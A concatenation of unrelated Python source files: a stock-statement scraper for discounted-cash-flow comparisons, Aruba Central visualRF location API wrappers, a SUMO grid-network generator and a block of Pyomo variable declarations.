if ticker in similars:
market_cap = similars[ticker]["market_cap"]
similars.pop(ticker, None)
if not no_filter:
similars = {
k: v for (k, v) in similars.items() if v["market_cap"] == market_cap
}
similars = list(similars)
return similars
def create_dataframe(ticker: str, statement: str, period: str = "annual"):
"""
Creates a df financial statement for a given ticker
Parameters
----------
ticker : str
The ticker to create a dataframe for
statement : str
The financial statement dataframe to create
period : str
Whether to look at annual, quarterly, or trailing
Returns
-------
statement : pd.DataFrame
The financial statement requested
rounding : int
The amount of rounding to use
statement_currency: str
The currency the financial statements are reported in
"""
if statement not in ["BS", "CF", "IS"]:
raise ValueError("statement variable must be 'BS','CF', or 'IS'")
if period not in ["annual", "quarterly", "trailing"]:
raise ValueError(
"statement variable must be 'annual','quarterly', or 'trailing'"
)
per_url = f"{period}/" if period != "annual" else ""
URL = f"https://stockanalysis.com/stocks/{ticker}/financials/"
URL += dcf_static.statement_url[statement] + per_url
ignores = dcf_static.statement_ignore[statement]
r = requests.get(URL, headers=dcf_static.headers)
if "404 - Page Not Found" in r.text:
return pd.DataFrame(), None, None
try:
df = pd.read_html(r.text)[0]
except ValueError:
return pd.DataFrame(), None, None
soup = BeautifulSoup(r.content, "html.parser")
phrase = soup.find("div", attrs={"class": "info-long svelte-f7kao3"})
phrase = phrase.get_text().lower() if phrase else ""
if "thousand" in phrase:
rounding = 1_000
elif "millions" in phrase:
rounding = 1_000_000
elif "billions" in phrase:
rounding = 1_000_000_000
else:
return pd.DataFrame(), None, None
for currency in CURRENCIES:
if currency.lower() in phrase:
statement_currency = currency
break
df = df.set_index("Year")
df = df.loc[:, ~(df == "Upgrade").any()]
for ignore in ignores:
if ignore in df.index:
df = df.drop([ignore])
df = df[df.columns[::-1]]
if statement == "IS":
vals = ["Revenue", dcf_static.gaap_is]
elif statement == "BS":
vals = ["Cash & Equivalents", dcf_static.gaap_bs]
elif statement == "CF":
vals = ["Net Income", dcf_static.gaap_cf]
if vals[0] in df.index:
blank_list = ["0" for _ in df.loc[vals[0]].to_list()]
else:
return pd.DataFrame(), None, None
for i, _ in enumerate(vals[1][1:]):
df = insert_row(vals[1][i + 1], vals[1][i], df, blank_list)
return df, rounding, statement_currency
@log_start_end(log=logger)
def get_similar_dfs(ticker: str, info: Dict[str, Any], n: int, no_filter: bool = False):
"""
Get dataframes for similar companies
Parameters
----------
ticker : str
The ticker to create a dataframe for
into : Dict[str,Any]
The dictionary produced from the yfinance.info function
n : int
The number of similar companies to produce
no_filter : bool
True means that we do not filter based on market cap
Returns
-------
new_list : List[str, pd.DataFrame]
A list of similar companies
"""
similars = others_in_sector(ticker, info["sector"], info["industry"], no_filter)
i = 0
new_list = []
while i < n and similars:
similar_ret = [create_dataframe(similars[0], x)[0] for x in ["BS", "IS", "CF"]]
blank = [x.empty for x in similar_ret]
if True not in blank:
vals = [similars[0], similar_ret]
new_list.append(vals)
i += 1
similars.pop(0)
return new_list
@log_start_end(log=logger)
def clean_dataframes(*args) -> List[pd.DataFrame]:
"""
All dataframes in the list take on the length | |
<reponame>karthikeyan-dhandapani/pycentral
# MIT License
#
# Copyright (c) 2020 Aruba, a Hewlett Packard Enterprise company
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from pycentral.url_utils import UrlObj
from pycentral.base_utils import console_logger
urls = UrlObj()
class ClientLocation(object):
"""A python class to obtain client location based on visualRF floor map.
"""
def get_client_location(self, conn, macaddr: str, offset=0, limit=100, units="FEET"):
"""Get location of a client. This function provides output only when visualRF is
configured in Aruba Central.
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param macaddr: Provide a macaddr of a client. For example "ac:bb:cc:dd:ec:10"
:type macaddr: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.CLIENT_LOCATION["GET_CLIENT_LOC"], macaddr)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_clients(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get location of clients within a floormap in Aruba Central visualRF.
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor_id returned by `get_building_floors()` function in
class:`FloorPlan`
:type floor_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.CLIENT_LOCATION["GET_FLOOR_CLIENTS"], floor_id, "client_location")
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
class RougueLocation(object):
"""A python class to obtain location of rogue access points
"""
def get_rogueap_location(self, conn, macaddr: str, offset=0, limit=100, units="FEET"):
"""Get location of rogue a access point based on its Mac Address
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param macaddr: Provide Mac Address of an Access Point
:type macaddr: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.ROGUE_LOCATION["GET_AP_LOC"], macaddr)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_rogueaps(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get rogue access points within a floor
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.ROGUE_LOCATION["GET_FLOOR_APS"], floor_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
class FloorPlan(object):
"""A Python class to obtain information of floorplan in Aruba Central visualRF.
"""
def get_campus_list(self, conn, offset=0, limit=100):
"""Get list of campuses in visualRF floorplan
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.FLOOR_PLAN["GET_CAMPUS_LIST"]
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_campus_buildings(self, conn, campus_id: str, offset=0, limit=100):
"""Get campus info and buildings within the campus
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param campus_id: Provide campus id. Can be obtained from `get_campus_list` function in
class:`FloorPlan`
:type campus_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_CAMPUS_INFO"], campus_id)
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_building_floors(self, conn, building_id: str, offset=0, limit=100, units="FEET"):
"""Get building info and floors within the building
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param building_id: Provide building id. Can be obtained from `get_campus_buildings` within
class:`FloorPlan`
:type building_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_BUILDING_INFO"], building_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_info(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get floor information
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_FLOOR_INFO"], floor_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_image(self, conn, floor_id, offset=0, limit=100):
"""Get Floor's background image in base64 format
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_FLOOR_IMG"], floor_id, "image")
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_aps(self, conn, floor_id, offset=0, limit=100, units="FEET"):
"""Get access points within a floor
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
:param offset: Pagination start index., defaults to 0
:type offset: int, optional
:param limit: Pagination size. Default 100 Max 100, defaults to 100
:type limit: int, optional
:param | |
from flow.core.generator import Generator
from collections import defaultdict
from lxml import etree
E = etree.Element
class SimpleGridGenerator(Generator):
"""Generator for nxm grid networks."""
def __init__(self, net_params, base):
super().__init__(net_params, base)
# this is a dictionary containing inner length, long outer length,
# short outer length, and number of rows and columns
self.grid_array = net_params.additional_params["grid_array"]
self.node_mapping = defaultdict(list)
self.name = "BobLoblawsLawBlog" # DO NOT CHANGE
def specify_nodes(self, net_params):
nodes = []
nodes += self._build_inner_nodes()
nodes += self._build_outer_nodes()
return nodes
def specify_tll(self, net_params):
return self._build_inner_nodes()
def specify_edges(self, net_params):
edges = []
edges += self._build_inner_edges()
edges += self._build_outer_edges()
# Sort node_mapping in counterclockwise order
self._order_nodes()
return edges
def specify_routes(self, net_params):
rts = {}
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
for i in range(row_num):
route_arr_bot = []
route_arr_top = []
for j in range(col_num + 1):
route_arr_bot += ["bot" + str(i) + '_' + str(j)]
route_arr_top += ["top" + str(i) + '_' + str(col_num - j)]
rts.update({"bot" + str(i) + '_' + '0': route_arr_bot})
rts.update({"top" + str(i) + '_' + str(col_num): route_arr_top})
for i in range(col_num):
route_arr_left = []
route_arr_right = []
for j in range(row_num + 1):
route_arr_right += ["right" + str(j) + '_' + str(i)]
route_arr_left += ["left" + str(row_num - j) + '_' + str(i)]
rts.update({"left" + str(row_num) + '_' + str(i): route_arr_left})
rts.update({"right" + '0' + '_' + str(i): route_arr_right})
return rts
def specify_types(self, net_params):
add_params = net_params.additional_params
horizontal_lanes = add_params["horizontal_lanes"]
vertical_lanes = add_params["vertical_lanes"]
if isinstance(add_params["speed_limit"], int) or \
isinstance(add_params["speed_limit"], float):
speed_limit = {"horizontal": add_params["speed_limit"],
"vertical": add_params["speed_limit"]}
else:
speed_limit = add_params["speed_limit"]
types = [{"id": "horizontal", "numLanes": repr(horizontal_lanes),
"speed": repr(speed_limit["horizontal"])},
{"id": "vertical", "numLanes": repr(vertical_lanes),
"speed": repr(speed_limit["vertical"])}]
return types
# ===============================
# ============ UTILS ============
# ===============================
def _build_inner_nodes(self):
"""Build out the inner nodes of the system.
The nodes are numbered from bottom left and increasing first across the
columns and then across the rows. For example, in a 3x3 grid, we will
have four inner nodes with the bottom left being 0, the bottom right
being 1, the top left being 2, the top right being 3. The coordinate of
the bottom left inner node is (0, 0).
Yields
------
list <dict>
List of inner nodes
"""
tls = self.net_params.additional_params.get("traffic_lights", True)
node_type = "traffic_light" if tls else "priority"
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
inner_length = self.grid_array["inner_length"]
nodes = []
# sweep up across columns
for i in range(row_num):
# sweep across rows
for j in range(col_num):
index = i * col_num + j
x_center = j * inner_length
y_center = i * inner_length
nodes.append({"id": "center" + str(index),
"x": repr(x_center),
"y": repr(y_center),
"type": node_type})
return nodes
def _build_outer_nodes(self):
"""Builds out the column nodes.
There are two in each column below the bottom row, and two in each
column above the top row. They are numbered with regards to the column
they are in. The bottom are labeled "bot_col_short" and "bot_col_long".
Top are named similarly. We then repeat the same process for the outer
row nodes
Yields
------
list <dict>
List of column, row nodes
"""
col_num = self.grid_array["col_num"]
row_num = self.grid_array["row_num"]
inner_length = self.grid_array["inner_length"]
short_length = self.grid_array["short_length"]
long_length = self.grid_array["long_length"]
nodes = []
for i in range(col_num):
# build the bottom nodes
nodes += [
{
"id": "bot_col_short" + str(i),
"x": repr(i * inner_length),
"y": repr(-short_length),
"type": "priority"
},
{
"id": "bot_col_long" + str(i),
"x": repr(i * inner_length),
"y": repr(-long_length),
"type": "priority"
}
]
# build the top nodes
nodes += [
{
"id": "top_col_short" + str(i),
"x": repr(i * inner_length),
"y": repr((row_num - 1) * inner_length + short_length),
"type": "priority"
},
{
"id": "top_col_long" + str(i),
"x": repr(i * inner_length),
"y": repr((row_num - 1) * inner_length + long_length),
"type": "priority"
}
]
for i in range(row_num):
# build the left nodes
nodes += [
{
"id": "left_row_short" + str(i),
"x": repr(-short_length),
"y": repr(i * inner_length),
"type": "priority"
},
{
"id": "left_row_long" + str(i),
"x": repr(-long_length),
"y": repr(i * inner_length),
"type": "priority"
}
]
# build the right nodes
nodes += [
{
"id": "right_row_short" + str(i),
"x": repr((col_num - 1) * inner_length + short_length),
"y": repr(i * inner_length),
"type": "priority"
},
{
"id": "right_row_long" + str(i),
"x": repr((col_num - 1) * inner_length + long_length),
"y": repr(i * inner_length),
"type": "priority"
}
]
return nodes
def _build_inner_edges(self):
"""Builds the inner edges.
First we build all of the column edges. For the upper edge, it would be
called right_i_j or left_i_j where i is the row number and j is the
column to the right of it.
For the vertical edges the notation would be bot_i_j or top_i_j where
i is the row above it, and j is the column number.
INDEXED FROM ZERO.
"""
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
inner_length = self.grid_array["inner_length"]
edges = []
# Build the horizontal edges
for i in range(row_num):
for j in range(col_num - 1):
node_index = i * col_num + j
index = "{}_{}".format(i, j+1)
self.node_mapping["center{}".format(node_index+1)].append(
"bot" + index)
self.node_mapping["center{}".format(node_index)].append(
"top" + index)
edges += [
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(node_index + 1),
"to": "center" + str(node_index),
"length": repr(inner_length)
},
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(node_index),
"to": "center" + str(node_index + 1),
"length": repr(inner_length)
}
]
# Build the vertical edges
for i in range(row_num - 1):
for j in range(col_num):
node_index_bot = i * col_num + j
node_index_top = (i + 1) * col_num + j
index = str(i + 1) + '_' + str(j)
self.node_mapping["center{}".format(node_index_top)].append(
"right" + index)
self.node_mapping["center{}".format(node_index_bot)].append(
"left" + index)
edges += [
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(node_index_bot),
"to": "center" + str(node_index_top),
"length": repr(inner_length)
},
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(node_index_top),
"to": "center" + str(node_index_bot),
"length": repr(inner_length)
}
]
return edges
def _build_outer_edges(self):
"""Builds the outer edges.
Starts with the bottom edges, then the top edges, then the left edges,
then the right.
Yields
------
list <dict>
List of outer edges
"""
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
short_length = self.grid_array["short_length"]
long_length = self.grid_array["long_length"]
edges = []
# create dictionary of node to edges that go to it
for i in range(col_num):
index = '0_' + str(i)
# bottom edges
self.node_mapping["center" + str(i)].append("right" + index)
edges += [
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "bot_col_short" + str(i),
"to": "center" + str(i),
"length": repr(short_length)
},
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(i),
"to": "bot_col_long" + str(i),
"length": repr(long_length)
}
]
# top edges
index = str(row_num) + '_' + str(i)
center_start = (row_num - 1) * col_num
self.node_mapping["center" + str(center_start + i)].append(
"left" + index)
edges += [
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "top_col_short" + str(i),
"to": "center" + str(center_start + i),
"length": repr(short_length)
},
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(center_start + i),
"to": "top_col_long" + str(i),
"length": repr(long_length)
}
]
# build the left and then the right edges
for j in range(row_num):
index = str(j) + '_0'
# left edges
self.node_mapping["center" + str(j*col_num)].append("bot" + index)
edges += [
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "left_row_short" + str(j),
"to": "center" + str(j * col_num),
"length": repr(short_length)
},
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(j * col_num),
"to": "left_row_long" + str(j),
"length": repr(long_length)
}
]
# right edges
index = str(j) + '_' + str(col_num)
center_index = (j * col_num) + col_num - 1
self.node_mapping["center"+str(center_index)].append("top"+index)
edges += [
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "right_row_short" + str(j),
"to": "center" + str(center_index),
"length": repr(short_length)
},
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(center_index),
"to": "right_row_long" + str(j),
"length": repr(long_length)
}
]
return edges
def _order_nodes(self):
for node | |
= Var(within=Reals,bounds=(0,None),initialize=0.2801968386)
m.x3157 = Var(within=Reals,bounds=(0,None),initialize=0.733594)
m.x3158 = Var(within=Reals,bounds=(0,None),initialize=0.820376)
m.x3159 = Var(within=Reals,bounds=(0,None),initialize=0.26446572658)
m.x3160 = Var(within=Reals,bounds=(0,None),initialize=0.36459279861)
m.x3161 = Var(within=Reals,bounds=(0,None),initialize=0.45401585246191)
m.x3162 = Var(within=Reals,bounds=(0,None),initialize=0.016128)
m.x3163 = Var(within=Reals,bounds=(0,None),initialize=0.057645288)
m.x3164 = Var(within=Reals,bounds=(0,None),initialize=0.550605149)
m.x3165 = Var(within=Reals,bounds=(0,None),initialize=1.3445426516)
m.x3166 = Var(within=Reals,bounds=(0,None),initialize=1.796832)
m.x3167 = Var(within=Reals,bounds=(0,None),initialize=1.973556551225)
m.x3168 = Var(within=Reals,bounds=(0,None),initialize=0.206376)
m.x3169 = Var(within=Reals,bounds=(0,None),initialize=0.69003631)
m.x3170 = Var(within=Reals,bounds=(0,None),initialize=1.85961062)
m.x3171 = Var(within=Reals,bounds=(0,None),initialize=0.301797)
m.x3172 = Var(within=Reals,bounds=(0,None),initialize=0.377093)
m.x3173 = Var(within=Reals,bounds=(0,None),initialize=0.048483)
m.x3174 = Var(within=Reals,bounds=(0,None),initialize=3.919623)
m.x3175 = Var(within=Reals,bounds=(0,None),initialize=1.010851)
m.x3176 = Var(within=Reals,bounds=(0,None),initialize=0.96210313818246)
m.x3177 = Var(within=Reals,bounds=(0,None),initialize=17.010810057992)
m.x3178 = Var(within=Reals,bounds=(0,None),initialize=0.001657)
m.x3179 = Var(within=Reals,bounds=(0,None),initialize=0.003)
m.x3180 = Var(within=Reals,bounds=(0,None),initialize=0.867817)
m.x3181 = Var(within=Reals,bounds=(0,None),initialize=0.8380421)
m.x3182 = Var(within=Reals,bounds=(0,None),initialize=0.4643778)
m.x3183 = Var(within=Reals,bounds=(0,None),initialize=0.598005)
m.x3184 = Var(within=Reals,bounds=(0,None),initialize=0.067617)
m.x3185 = Var(within=Reals,bounds=(0,None),initialize=0.00372960573385935)
m.x3186 = Var(within=Reals,bounds=(0,None),initialize=0.0401850390889487)
m.x3187 = Var(within=Reals,bounds=(0,None),initialize=0.160617992804942)
m.x3188 = Var(within=Reals,bounds=(0,None),initialize=0.314291634314725)
m.x3189 = Var(within=Reals,bounds=(0,None),initialize=0.0124974914075008)
m.x3190 = Var(within=Reals,bounds=(0,None),initialize=0.154267427901957)
m.x3191 = Var(within=Reals,bounds=(0,None),initialize=0.0052963520787978)
m.x3192 = Var(within=Reals,bounds=(0,None),initialize=0.0971128924162473)
m.x3193 = Var(within=Reals,bounds=(0,None),initialize=0.056183983490731)
m.x3194 = Var(within=Reals,bounds=(0,None),initialize=0.106606693358826)
m.x3195 = Var(within=Reals,bounds=(0,None),initialize=0.238115076231716)
m.x3196 = Var(within=Reals,bounds=(0,None),initialize=0.834418589810566)
m.x3197 = Var(within=Reals,bounds=(0,None),initialize=0.837237)
m.x3198 = Var(within=Reals,bounds=(0,None),initialize=30.88885)
m.x3199 = Var(within=Reals,bounds=(0,None),initialize=0.002039)
m.x3200 = Var(within=Reals,bounds=(0,None),initialize=0.092048)
m.x3201 = Var(within=Reals,bounds=(0,None),initialize=0.10583)
m.x3202 = Var(within=Reals,bounds=(0,None),initialize=1.18953)
m.x3203 = Var(within=Reals,bounds=(0,None),initialize=1.392856)
m.x3204 = Var(within=Reals,bounds=(0,None),initialize=0.169569)
m.x3205 = Var(within=Reals,bounds=(0,None),initialize=0.898689)
m.x3206 = Var(within=Reals,bounds=(0,None),initialize=0.0323711716535549)
m.x3207 = Var(within=Reals,bounds=(0,None),initialize=0.711985)
m.x3208 = Var(within=Reals,bounds=(0,None),initialize=0.0257540749)
m.x3209 = Var(within=Reals,bounds=(0,None),initialize=0.0639535943)
m.x3210 = Var(within=Reals,bounds=(0,None),initialize=0.11946748)
m.x3211 = Var(within=Reals,bounds=(0,None),initialize=0.348375638894449)
m.x3212 = Var(within=Reals,bounds=(0,None),initialize=0.018807821)
m.x3213 = Var(within=Reals,bounds=(0,None),initialize=0.17366008)
m.x3214 = Var(within=Reals,bounds=(0,None),initialize=0.4408847888)
m.x3215 = Var(within=Reals,bounds=(0,None),initialize=0.41979766)
m.x3216 = Var(within=Reals,bounds=(0,None),initialize=0.166015)
m.x3217 = Var(within=Reals,bounds=(0,None),initialize=0.75507590019)
m.x3218 = Var(within=Reals,bounds=(0,None),initialize=0.06667129632)
m.x3219 = Var(within=Reals,bounds=(0,None),initialize=0.02390003232)
m.x3220 = Var(within=Reals,bounds=(0,None),initialize=0.889199)
m.x3221 = Var(within=Reals,bounds=(0,None),initialize=2.56598)
m.x3222 = Var(within=Reals,bounds=(0,None),initialize=0.850837)
m.x3223 = Var(within=Reals,bounds=(0,None),initialize=0.765673)
m.x3224 = Var(within=Reals,bounds=(0,None),initialize=0.166026)
m.x3225 = Var(within=Reals,bounds=(0,None),initialize=8.58992245423785)
m.x3226 = Var(within=Reals,bounds=(0,None),initialize=0.32664961308465)
m.x3227 = Var(within=Reals,bounds=(0,None),initialize=0.031157)
m.x3228 = Var(within=Reals,bounds=(0,None),initialize=0.337803)
m.x3229 = Var(within=Reals,bounds=(0,None),initialize=1.4968645)
m.x3230 = Var(within=Reals,bounds=(0,None),initialize=1.0723521)
m.x3231 = Var(within=Reals,bounds=(0,None),initialize=0.1794015)
m.x3232 = Var(within=Reals,bounds=(0,None),initialize=0.03537)
m.x3233 = Var(within=Reals,bounds=(0,None),initialize=0.047224)
m.x3234 = Var(within=Reals,bounds=(0,None),initialize=0.00339720287392297)
m.x3235 = Var(within=Reals,bounds=(0,None),initialize=0.0366035286363681)
m.x3236 = Var(within=Reals,bounds=(0,None),initialize=0.146302838878375)
m.x3237 = Var(within=Reals,bounds=(0,None),initialize=0.286280245027153)
m.x3238 = Var(within=Reals,bounds=(0,None),initialize=0.0113836466254184)
m.x3239 = Var(within=Reals,bounds=(0,None),initialize=0.140518271050308)
m.x3240 = Var(within=Reals,bounds=(0,None),initialize=0.00482431221618192)
m.x3241 = Var(within=Reals,bounds=(0,None),initialize=0.0884576603409654)
m.x3242 = Var(within=Reals,bounds=(0,None),initialize=0.0511765596160332)
m.x3243 = Var(within=Reals,bounds=(0,None),initialize=0.0971053218226534)
m.x3244 = Var(within=Reals,bounds=(0,None),initialize=0.216892958404401)
m.x3245 = Var(within=Reals,bounds=(0,None),initialize=0.760050641713784)
m.x3246 = Var(within=Reals,bounds=(0,None),initialize=0.8307)
m.x3247 = Var(within=Reals,bounds=(0,None),initialize=0.78878076270671)
m.x3248 = Var(within=Reals,bounds=(0,None),initialize=0.0965103137186489)
m.x3249 = Var(within=Reals,bounds=(0,None),initialize=1.02351445057984)
m.x3250 = Var(within=Reals,bounds=(0,None),initialize=0.11684)
m.x3251 = Var(within=Reals,bounds=(0,None),initialize=0.199507)
m.x3252 = Var(within=Reals,bounds=(0,None),initialize=0.168241)
m.x3253 = Var(within=Reals,bounds=(0,None),initialize=0.052262056)
m.x3254 = Var(within=Reals,bounds=(0,None),initialize=0.05417050096)
m.x3255 = Var(within=Reals,bounds=(0,None),initialize=0.657434166259682)
m.x3256 = Var(within=Reals,bounds=(0,None),initialize=0.011139125)
m.x3257 = Var(within=Reals,bounds=(0,None),initialize=0.021414)
m.x3258 = Var(within=Reals,bounds=(0,None),initialize=0.24162118)
m.x3259 = Var(within=Reals,bounds=(0,None),initialize=0.417857)
m.x3260 = Var(within=Reals,bounds=(0,None),initialize=0.385335)
m.x3261 = Var(within=Reals,bounds=(0,None),initialize=0.327300211885)
m.x3262 = Var(within=Reals,bounds=(0,None),initialize=0.113598)
m.x3263 = Var(within=Reals,bounds=(0,None),initialize=0.2449074)
m.x3264 = Var(within=Reals,bounds=(0,None),initialize=0.207387)
m.x3265 = Var(within=Reals,bounds=(0,None),initialize=0.135954)
m.x3266 = Var(within=Reals,bounds=(0,None),initialize=0.7440609730878)
m.x3267 = Var(within=Reals,bounds=(0,None),initialize=0.0048929009094)
m.x3268 = Var(within=Reals,bounds=(0,None),initialize=4.827416)
m.x3269 = Var(within=Reals,bounds=(0,None),initialize=0.061566)
m.x3270 = Var(within=Reals,bounds=(0,None),initialize=0.161833)
m.x3271 = Var(within=Reals,bounds=(0,None),initialize=4.5723542)
m.x3272 = Var(within=Reals,bounds=(0,None),initialize=0.1751165)
m.x3273 = Var(within=Reals,bounds=(0,None),initialize=32.73651)
m.x3274 = Var(within=Reals,bounds=(0,None),initialize=11.0124286094421)
m.x3275 = Var(within=Reals,bounds=(0,None),initialize=0.0754548203645344)
m.x3276 = Var(within=Reals,bounds=(0,None),initialize=0.030611)
m.x3277 = Var(within=Reals,bounds=(0,None),initialize=0.00298)
m.x3278 = Var(within=Reals,bounds=(0,None),initialize=0.008740732)
m.x3279 = Var(within=Reals,bounds=(0,None),initialize=0.1472727647)
m.x3280 = Var(within=Reals,bounds=(0,None),initialize=0.00393139464625758)
m.x3281 = Var(within=Reals,bounds=(0,None),initialize=0.086962)
m.x3282 = Var(within=Reals,bounds=(0,None),initialize=0.001129)
m.x3283 = Var(within=Reals,bounds=(0,None),initialize=0.057378)
m.x3284 = Var(within=Reals,bounds=(0,None),initialize=0.001618)
m.x3285 = Var(within=Reals,bounds=(0,None),initialize=0.07928459658)
m.x3286 = Var(within=Reals,bounds=(0,None),initialize=0.021643)
m.x3287 = Var(within=Reals,bounds=(0,None),initialize=0.003401)
m.x3288 = Var(within=Reals,bounds=(0,None),initialize=0.220185)
m.x3289 = Var(within=Reals,bounds=(0,None),initialize=0.0150409)
